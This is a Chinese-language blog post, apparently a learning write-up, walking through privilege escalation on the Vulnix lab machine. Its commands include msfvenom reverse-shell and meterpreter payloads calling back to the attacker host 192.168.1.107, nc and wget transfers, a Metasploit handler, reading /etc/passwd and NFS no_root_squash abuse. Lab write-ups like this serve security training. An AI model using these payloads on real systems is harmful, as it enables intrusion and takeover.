

  <!DOCTYPE html>
  <html lang="en" data-default-color-scheme=&#34;dark&#34; >
  <style>
    .text1
    {
    text-shadow: 0px 0px 2px #f2f3f2;
    }
    </style>

  

<head>
  <meta charset="UTF-8">
  <link rel="apple-touch-icon" sizes="76x76" href="/null">
  <link rel="icon" type="image/png" href="/null">
  <meta name="viewport"
        content="width=device-width, initial-scale=1.0, maximum-scale=1.0, user-scalable=no, shrink-to-fit=no">
  <meta http-equiv="x-ua-compatible" content="ie=edge">
  
  <meta name="theme-color" content="#2f4154">
  <meta name="description" content="">
  <meta name="author" content="John Doe">
  <meta name="keywords" content="">
  <title>whale3070&#39;s blog</title>

  <link  rel="stylesheet" href="https://cdn.jsdelivr.net/npm/bootstrap@4.5.3/dist/css/bootstrap.min.css" />


  <link  rel="stylesheet" href="https://cdn.jsdelivr.net/npm/github-markdown-css@4.0.0/github-markdown.min.css" />
  <link  rel="stylesheet" href="/lib/hint/hint.min.css" />

  
    
    
      
      <link  rel="stylesheet" href="https://cdn.jsdelivr.net/npm/highlight.js@10.4.0/styles/github-gist.min.css" />
    
  

  
    <link  rel="stylesheet" href="https://cdn.jsdelivr.net/npm/@fancyapps/fancybox@3.5.7/dist/jquery.fancybox.min.css" />
  



<!-- 主题依赖的图标库，不要自行修改 -->

<link rel="stylesheet" href="//at.alicdn.com/t/font_1749284_ba1fz6golrf.css">



<link rel="stylesheet" href="//at.alicdn.com/t/font_1736178_kmeydafke9r.css">


<link  rel="stylesheet" href="/css/main.css" />

<!-- 自定义样式保持在最底部 -->


  <script id="fluid-configs">
    var Fluid = window.Fluid || {};
    var CONFIG = {"hostname":"example.com","root":"/","version":"1.8.7","typing":{"enable":false,"typeSpeed":70,"cursorChar":"_","loop":false},"anchorjs":{"enable":true,"element":"h1,h2,h3,h4,h5,h6","placement":"right","visible":"hover","icon":""},"progressbar":{"enable":true,"height_px":3,"color":"#29d","options":{"showSpinner":false,"trickleSpeed":100}},"copy_btn":true,"image_zoom":{"enable":true},"toc":{"enable":true,"headingSelector":"h1,h2,h3,h4,h5,h6","collapseDepth":0},"lazyload":{"enable":true,"onlypost":false},"web_analytics":{"enable":false,"baidu":null,"google":null,"gtag":null,"tencent":{"sid":null,"cid":null},"woyaola":null,"cnzz":null,"leancloud":{"app_id":null,"app_key":null,"server_url":null}}};
  </script>
  <script  src="/js/utils.js" ></script>
  <script  src="/js/color-schema.js" ></script>
<meta name="generator" content="Hexo 5.4.0"></head>


    <body>
      <header style="height: 70vh;">
        <nav id="navbar" class="navbar fixed-top  navbar-expand-lg navbar-dark scrolling-navbar">
  <div class="container">
    <a class="navbar-brand"
       href="/">&nbsp;<strong>InfoSec learning</strong>&nbsp;</a>

    <button id="navbar-toggler-btn" class="navbar-toggler" type="button" data-toggle="collapse"
            data-target="#navbarSupportedContent"
            aria-controls="navbarSupportedContent" aria-expanded="false" aria-label="Toggle navigation">
      <div class="animated-icon"><span></span><span></span><span></span></div>
    </button>

    <!-- Collapsible content -->
    <div class="collapse navbar-collapse" id="navbarSupportedContent">
      <ul class="navbar-nav ml-auto text-center">
        
          
          
          
          
            <li class="nav-item">
              <a class="nav-link" href="/">
                <i class="iconfont icon-home-fill"></i>
                Home
              </a>
            </li>
          
        
          
          
          
          
            <li class="nav-item">
              <a class="nav-link" href="/archives/">
                <i class="iconfont icon-archive-fill"></i>
                Archives
              </a>
            </li>
          
        
          
          
          
          
            <li class="nav-item">
              <a class="nav-link" href="/categories/">
                <i class="iconfont icon-category-fill"></i>
                Categories
              </a>
            </li>
          
        
          
          
          
          
            <li class="nav-item">
              <a class="nav-link" href="/tags/">
                <i class="iconfont icon-tags-fill"></i>
                Tags
              </a>
            </li>
          
        
        
          <li class="nav-item" id="search-btn">
            <a class="nav-link" data-toggle="modal" data-target="#modalSearch">&nbsp;<i
                class="iconfont icon-search"></i>&nbsp;</a>
          </li>
        
        
          
        
      </ul>
    </div>
  </div>
</nav>

          <div class="banner" id="banner" false
            style="background: url('/img/default.png') no-repeat center center;
              background-size: cover;">
              <div class="full-bg-img">
                <div class="mask flex-center" style="background-color: rgba(0, 0, 0, 0.3)">
                  <div class="page-header text-center fade-in-up">
                    <span class="h2 text1" id="subtitle" title="">
                      
                        
                      
                    </span>
        
                    
                      <div class="mt-3">
  
  
    <span class="post-meta">
      <i class="iconfont icon-date-fill" aria-hidden="true"></i>
      <time datetime="2017-12-04 00:00" pubdate>
        December 4, 2017 am
      </time>
    </span>
  
</div>

<div class="mt-1">
  
    
    <span class="post-meta mr-2">
      <i class="iconfont icon-chart"></i>
      1.2k 字
    </span>
  

  
    
    <span class="post-meta mr-2">
      <i class="iconfont icon-clock-fill"></i>
      
      
      16
       分钟
    </span>
  

  
  
</div>

                    
                  </div>
                    
                  </div>
                  
                </div>
              </div>
          </div>
      </header>

      <main>
        
          

<div class="container-fluid nopadding-x">
  <div class="row nomargin-x">
    <div class="d-none d-lg-block col-lg-2"></div>
    <div class="col-lg-8 nopadding-x-md">
      <div class="container nopadding-x-md" id="board-ctn">
        <div class="py-5" id="board">
          <article class="post-content mx-auto">
            <!-- SEO header -->
            <h1 style="display: none"></h1>
            
            <div class="markdown-body">
              <p>::: {.container}<br>::: {.post}<br>::: {.show-content}<br><a target="_blank" rel="noopener" href="https://www.jianshu.com/p/4487af2fc94b">续上篇</a>：前景提要，通过smtp的信息泄露，用暴力枚举的方式，我们得到了一个ssh登陆普通用户权限的账号和密码。</p>
<p>根据以往的经验，提权可以通过linux内核的漏洞，然后运行对应的exploit，来进行提权。</p>
<blockquote>
<p>uname -a   <br>搜索exploit-db，有提权漏洞。<a target="_blank" rel="noopener" href="https://www.exploit-db.com/exploits/18411/">https://www.exploit-db.com/exploits/18411/</a></p>
<p>linux 3.2.0-29-generic-pae</p>
</blockquote>
<blockquote>
<p>gcc           不能用gcc编译exploit</p>
<p>The program &#39;gcc&#39; can be found in the following packages:</p>
<p>* gcc</p>
<p>* pentium-builder</p>
<p>Ask your administrator to install one of them</p>
</blockquote>
<p>因为目标靶机没有权限用gcc编译，所以尝试在kali上编译好了发送过来。</p>
<blockquote>
<p>nc -lvp 666 &lt; shell           shell是编译好的可执行文件，在kali上监听</p>
<p>nc  192.168.1.107 666 &gt; shell <br> 连接攻击机的666端口，将文件保存为shell</p>
<p>chmod +x shell</p>
<p>./shell</p>
<p>-bash: ./shell: <strong>cannot execute binary file</strong></p>
</blockquote>
<p> cannot execute binary<br>file：<a target="_blank" rel="noopener" href="http://blog.51cto.com/1381479/888198">参考</a></p>
<p>那么，可能的原因是不是root，权限不过。要么是，版本不同，必须在目标靶机上编译才能运行。</p>
<h1 id="尝试反弹一个shell给攻击机"><a href="#尝试反弹一个shell给攻击机" class="headerlink" title="尝试反弹一个shell给攻击机"></a>尝试反弹一个shell给攻击机</h1><p>攻击机：msfvenom -p linux/x86/shell_reverse_tcp -f elf<br>lhost=192.168.1.107 lport=1234 &gt; /var/www/shell</p>
<p>              nc -lvp 666 &lt; /var/www/shell</p>
<p>靶机：nc 192.168.1.107 666 &gt; exploit</p>
<p>            chmod +x exploit</p>
<p>攻击机：msfconsole</p>
<p>            use exploit/multi/handler</p>
<p>            set payload linux/x86/shell_reverse_tcp</p>
<p>            set LHOST 192.168.1.107</p>
<p>            set LPORT 1234</p>
<p>            run</p>
<p>靶机：./exploit</p>
<p>我说怎么还是user权限，不是meterpreter.….原来生成的攻击载荷搞错了。ORZ</p>
<p>::: {.image-package}<br><img src="http://upload-images.jianshu.io/upload_images/2883590-7357f98f994f3def.PNG?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240" srcset="/img/loading.gif">{.uploaded-img<br>width=”auto” height=”auto”}\</p>
<p>::: {.image-caption}<br>:::<br>:::</p>
<h4 id="重新尝试："><a href="#重新尝试：" class="headerlink" title="重新尝试："></a>重新尝试：</h4><p>msfvenom -p linux/x86/meterpreter_reverse_tcp LHOST=192.168.1.107<br>LPORT=1234 X &gt; /var/www/door</p>
<p>省略一些命令。。。</p>
<p>::: {.image-package}<br><img src="http://upload-images.jianshu.io/upload_images/2883590-52f29ec62460154c.PNG?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240" srcset="/img/loading.gif">{.uploaded-img<br>width=”auto” height=”auto”}\</p>
<p>::: {.image-caption}<br>:::<br>:::</p>
<p>em..?未知的命令.….所以meterpreter该怎么用。</p>
<blockquote>
<p>ps                          列出所有进程</p>
</blockquote>
<blockquote>
<p>migrate 1785          迁移到pid为1785的进程</p>
</blockquote>
<p>[*] Migrating to 1785</p>
<p>[-] Error running command migrate: Rex::RuntimeError Unsupported<br>session x86/linux</p>
<blockquote>
<p>getsystem</p>
</blockquote>
<p>[-] Unknown command: getsystem.</p>
<p><a target="_blank" rel="noopener" href="http://wooyun.jozxing.cc/static/drops/tips-10146.html">据说</a>：getsystem<br>大部分都会失败 他只尝试了4个Payload。</p>
<p>但是，就是失败，也不应该是unknown<br>command？怀疑我用的是假的meterpreter....….</p>
<h4 id="第二次重新尝试："><a href="#第二次重新尝试：" class="headerlink" title="第二次重新尝试："></a>第二次重新尝试：</h4><p>查看payload需要的参数：</p>
<p>方法一：msfvenom -p linux/x86/meterpreter/reverse_tcp<br>--payload-options   </p>
<blockquote>
<p>Basic options:</p>
<p>Name  Current Setting  Required  Description</p>
<p>LPORT  4444                yes      The listen port</p>
<p>RHOST                         no        The target address</p>
</blockquote>
<p>方法二：use  payload/linux/x86/meterpreter/reverse_tcp</p>
<p>              show options</p>
<p>              back</p>
<hr>
<p>msfvenom -p linux/x86/meterpreter/reverse_tcp -f elf<br>LHOST=192.168.1.107 LPORT=1234 X &gt; /var/www/html/xxx</p>
<p>wget <a target="_blank" rel="noopener" href="http://192.168.1.107/xxx">http://192.168.1.107/xxx</a></p>
<p>成功获取到了meterpreter。</p>
<p>::: {.image-package}<br><img src="http://upload-images.jianshu.io/upload_images/2883590-c0300f478e71f626.PNG?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240" srcset="/img/loading.gif">{.uploaded-img<br>width=”auto” height=”auto”}\</p>
<p>::: {.image-caption}<br>:::<br>:::</p>
<blockquote>
<p>cat /etc/passwd</p>
</blockquote>
<p>根据大于500的为用户账号，系统用户有</p>
<p>user:x:<strong>1000</strong>:1000:user,,,:/home/user:/bin/bash</p>
<p>vulnix:x:<strong>2008</strong>:2008::/home/vulnix:/bin/bash</p>
<p>nobody:x:65534:65534:nobody:/nonexistent:/bin/sh</p>
<blockquote>
<p>background</p>
</blockquote>
<p>search exploit/linux/local </p>
<p><a target="_blank" rel="noopener" href="https://www.offensive-security.com/metasploit-unleashed/privilege-escalation/">meterpreter提权参考</a>。陷入了困境，不知道运行什么样的exp才能获取到最高权限。</p>
<blockquote>
<p>search cve:2012-0056     <br> 找到一个通过cve编号搜索的方法，但是msf没有对应的exp可用</p>
</blockquote>
<hr>
<p>2018.2.4更新。暂时先放一放meterpreter提权，在上一篇侦察中，获取到靶机开放了nfs服务，Network<br>File System，网络文件系统。用来共享文件。</p>
<blockquote>
<p><strong>2049/tcp open  nfs_acl</strong>    2-3 (RPC #100227)</p>
</blockquote>
<p>于是，需要用nfs客户端，<strong>apt-get install nfs-common。</strong></p>
<p>**参考：<a target="_blank" rel="noopener" href="http://www.phpfans.net/ask/answer1/3810159017.html">http://www.phpfans.net/ask/answer1/3810159017.html</a><br>（root_squath )<br>**</p>
<p>**       <br>  <a target="_blank" rel="noopener" href="http://blog.csdn.net/yesuhuangsi/article/details/66475053%EF%BC%88ssh%E4%BD%BF%E7%94%A8RSA%E5%85%AC%E9%92%A5%E5%85%8D%E5%AF%86%E7%99%BB%E5%BD%95%E8%BF%9C%E7%A8%8B%E4%B8%BB%E6%9C%BA%EF%BC%89">http://blog.csdn.net/yesuhuangsi/article/details/66475053（ssh使用RSA公钥免密登录远程主机）</a>**</p>
<p>          <a target="_blank" rel="noopener" href="https://www.jianshu.com/p/72e892ab8edf">https://www.jianshu.com/p/72e892ab8edf</a><br>(三步实现SSH无密码登录)**<br>**</p>
<p>**          <a target="_blank" rel="noopener" href="http://man.linuxde.net/nano">http://man.linuxde.net/nano</a> （编辑器nano用法）**</p>
<p><strong>将靶机root_squash，更改为no_root_squash.</strong></p>
<blockquote>
<p>no_root_squash：登入 NFS 主机使用分享目录的使用者，如果是 root<br>的话，那么对于这个分享的目录来说，他就具有 root<br>的权限！这个项目『极不安全』，不建议使用！</p>
<p>root_squash：在登入 NFS 主机使用分享之目录的使用者如果是 root<br>时，那么这个使用者的权限将被压缩成为匿名使用者，通常他的 UID 与 GID<br>都会变成 nobody 那个系统账号的身份。</p>
</blockquote>
<p><a target="_blank" rel="noopener" href="https://www.cnblogs.com/dantes91/p/5007992.html">关于nfs共享目录的使用技巧</a>，如果没有用过nfs服务，学习下。</p>
<p>::: {.image-package}<br><img src="http://upload-images.jianshu.io/upload_images/2883590-8be58c6b635481e1.PNG?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240" srcset="/img/loading.gif">{.uploaded-img<br>width=”auto” height=”auto”}\</p>
<p>::: {.image-caption}<br>显示远程服务器共享目录<br>:::<br>:::</p>
<p><strong>将远程共享目录挂载到本地</strong>，/tmp/nfs<br>是本地的一个目录。如果没有该目录，可以用”mkdir /tmp/nfs”来新建。<br>mount -t nfs 192.168.1.113:/home/vulnix <strong>/tmp/nfs</strong></p>
<p>::: {.image-package}<br><img src="http://upload-images.jianshu.io/upload_images/2883590-178665a456328798.PNG?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240" srcset="/img/loading.gif">{.uploaded-img<br>width=”auto” height=”auto”}\</p>
<p>::: {.image-caption}<br>:::<br>:::</p>
<p>**writup: <a target="_blank" rel="noopener" href="http://www.abatchy.com/2016/10/walkthrough-vulnix-vulnhub-vm/">http://www.abatchy.com/2016/10/walkthrough-vulnix-vulnhub-vm\</a><br>**</p>
<p><strong>靶机重启后，有root权限，就可以用gcc编译exp了。</strong></p>
<p>**cp /root/Desktop/shell.c .<br>**</p>
<p>**gcc shell.c -o shell<br>**</p>
<p>**chmod +x shell<br>**</p>
<p>**./shell<br>**</p>
<h1 id="总结："><a href="#总结：" class="headerlink" title="总结："></a><strong>总结：</strong></h1><p><strong>nfs网络文件系统以前根本没用过，，协议不是很熟悉，所以也不知道怎么利用。。</strong></p>
<p><strong>no_root_squash提权，就好比ftp协议的匿名用户读写权限吧，我是这么想的。。</strong></p>
<p><strong>简单邮件协议smtp配置不当会泄露用户名什么的，再利用ssh爆破真是骚操作。。</strong><br>:::<br>:::<br>:::</p>

            </div>
            <hr>
            <div>
              <div class="post-metas mb-3">
                
                  <div class="post-meta mr-3">
                    <i class="iconfont icon-category"></i>
                    
                      <a class="hover-with-bg" href="/categories/training/">training</a>
                    
                  </div>
                
                
                  <div class="post-meta">
                    <i class="iconfont icon-tags"></i>
                    
                      <a class="hover-with-bg" href="/tags/training/">training</a>
                    
                  </div>
                
              </div>
              
                
              
              
                <div class="post-prevnext">
                  <article class="post-prev col-6">
                    
                    
                      <a href="/2018/01/01/%E6%88%91%E7%9A%84%E8%AF%BE%E7%A8%8B%E8%A1%A82018/">
                        <i class="iconfont icon-arrowleft"></i>
                        <span class="hidden-mobile">我的课程表2018</span>
                        <span class="visible-mobile">Previous</span>
                      </a>
                    
                  </article>
                  <article class="post-next col-6">
                    
                    
                      <a href="/2017/12/03/NFS%E7%BD%91%E7%BB%9C%E6%96%87%E4%BB%B6%E7%B3%BB%E7%BB%9F%EF%BC%88snmp%E4%BF%A1%E6%81%AF%E6%90%9C%E9%9B%86+ssh%E7%88%86%E7%A0%B4%EF%BC%89.html/">
                        <span class="hidden-mobile"></span>
                        <span class="visible-mobile">Next</span>
                        <i class="iconfont icon-arrowright"></i>
                      </a>
                    
                  </article>
                </div>
              
            </div>

            
          </article>
        </div>
      </div>
    </div>
    
      <div class="d-none d-lg-block col-lg-2 toc-container" id="toc-ctn">
        <div id="toc">
  <p class="toc-header"><i class="iconfont icon-list"></i>&nbsp;TOC</p>
  <div class="toc-body" id="toc-body"></div>
</div>

      </div>
    
  </div>
</div>

<!-- Custom -->


            

                
                  <a id="scroll-top-button" href="#" role="button">
                    <i class="iconfont icon-arrowup" aria-hidden="true"></i>
                  </a>
                  

                    
                      <div class="modal fade" id="modalSearch" tabindex="-1" role="dialog" aria-labelledby="ModalLabel"
     aria-hidden="true">
  <div class="modal-dialog modal-dialog-scrollable modal-lg" role="document">
    <div class="modal-content">
      <div class="modal-header text-center">
        <h4 class="modal-title w-100 font-weight-bold">Search</h4>
        <button type="button" id="local-search-close" class="close" data-dismiss="modal" aria-label="Close">
          <span aria-hidden="true">&times;</span>
        </button>
      </div>
      <div class="modal-body mx-3">
        <div class="md-form mb-5">
          <input type="text" id="local-search-input" class="form-control validate">
          <label data-error="x" data-success="v"
                 for="local-search-input">keyword</label>
        </div>
        <div class="list-group" id="local-search-result"></div>
      </div>
    </div>
  </div>
</div>
                        

                          
      </main>

      <footer class="text-center mt-5 py-3">
  <div class="footer-content">
     <a href="https://whale3070.github.io/" target="_blank" rel="nofollow noopener"><span>Whale3070</span></a> 
  </div>
  
  <div class="statistics">
    
    

    
      
        <!-- 不蒜子统计PV -->
        <span id="busuanzi_container_site_pv" style="display: none">
            总访问量 
            <span id="busuanzi_value_site_pv"></span>
             次
          </span>
      
      
        <!-- 不蒜子统计UV -->
        <span id="busuanzi_container_site_uv" style="display: none">
            总访客数 
            <span id="busuanzi_value_site_uv"></span>
             人
          </span>
      
    
  </div>


  

  
</footer>

<!-- SCRIPTS -->

  <script  src="https://cdn.jsdelivr.net/npm/nprogress@0.2.0/nprogress.min.js" ></script>
  <link  rel="stylesheet" href="https://cdn.jsdelivr.net/npm/nprogress@0.2.0/nprogress.min.css" />

  <script>
    NProgress.configure({"showSpinner":false,"trickleSpeed":100})
    NProgress.start()
    window.addEventListener('load', function() {
      NProgress.done();
    })
  </script>


<script  src="https://cdn.jsdelivr.net/npm/jquery@3.5.1/dist/jquery.min.js" ></script>
<script  src="https://cdn.jsdelivr.net/npm/bootstrap@4.5.3/dist/js/bootstrap.min.js" ></script>
<script  src="/js/debouncer.js" ></script>
<script  src="/js/events.js" ></script>
<script  src="/js/plugins.js" ></script>

<!-- Plugins -->


  
    <script  src="/js/lazyload.js" ></script>
  



  



  <script  src="https://cdn.jsdelivr.net/npm/tocbot@4.12.0/dist/tocbot.min.js" ></script>



  <script  src="https://cdn.jsdelivr.net/npm/@fancyapps/fancybox@3.5.7/dist/jquery.fancybox.min.js" ></script>



  <script  src="https://cdn.jsdelivr.net/npm/anchor-js@4.3.0/anchor.min.js" ></script>



  <script defer src="https://cdn.jsdelivr.net/npm/clipboard@2.0.6/dist/clipboard.min.js" ></script>



  <script defer src="https://busuanzi.ibruce.info/busuanzi/2.3/busuanzi.pure.mini.js" ></script>






  <script  src="/js/local-search.js" ></script>
  <script>
    (function () {
      var path = "/local-search.xml";
      var inputArea = document.querySelector("#local-search-input");
      inputArea.onclick = function () {
        searchFunc(path, 'local-search-input', 'local-search-result');
        this.onclick = null
      }
    })()
  </script>















<!-- 主题的启动项 保持在最底部 -->
<script  src="/js/boot.js" ></script>



    </body>

  </html>